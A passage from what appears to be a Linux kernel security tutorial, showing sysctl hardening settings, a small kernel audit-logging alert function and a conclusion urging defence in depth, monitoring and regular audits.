# Memory protections
vm.mmap_min_addr = 65536
vm.mmap_rnd_bits = 32
vm.mmap_rnd_compat_bits = 16

# Disable dangerous features
kernel.sysrq = 0
kernel.core_uses_pid = 1
kernel.modules_disabled = 1
EOF
3. Monitoring and Alerting
/* Audit-plumbed alerting: record a security event in the kernel audit
 * log (with pid/uid context) and forward it to a userspace monitor over
 * netlink. Silently drops the audit record if audit_log_start() fails
 * under memory pressure. */
/* Kernel Security Event Monitor */
static void security_event(enum event_type type, const char *msg) { struct audit_buffer *ab;
ab = audit_log_start(NULL, GFP_KERNEL, AUDIT_KERNEL); if (!ab) return;
audit_log_format(ab, "security_event=%d msg=%s pid=%d uid=%d", type, msg, current->pid, current_uid().val); audit_log_end(ab);
// Send to userspace monitor netlink_send_alert(type, msg);}
Conclusion
Kernel security is an ongoing battle between attackers and defenders. Understanding exploitation techniques is crucial for building effective defenses. Key takeaways:
- Assume Breach: Design systems assuming kernel compromise is possible
- Defense in Depth: Layer multiple security mechanisms
- Monitor Everything: Detection is as important as prevention
- Stay Updated: New techniques emerge constantly
- Test Security: Regular penetration testing and audits
The kernel will always be a high-value target. By understanding both attack and defense techniques, we can build more resilient systems and respond effectively when compromises occur.
Resources
- Kernel Exploitation Resources
- Linux Kernel Security Documentation
- KSPP (Kernel Self Protection Project)
- Linux Kernel CVE Database
Next: Linux Kernel Observability and Tracing - Understanding System Behavior with ftrace, perf, and eBPF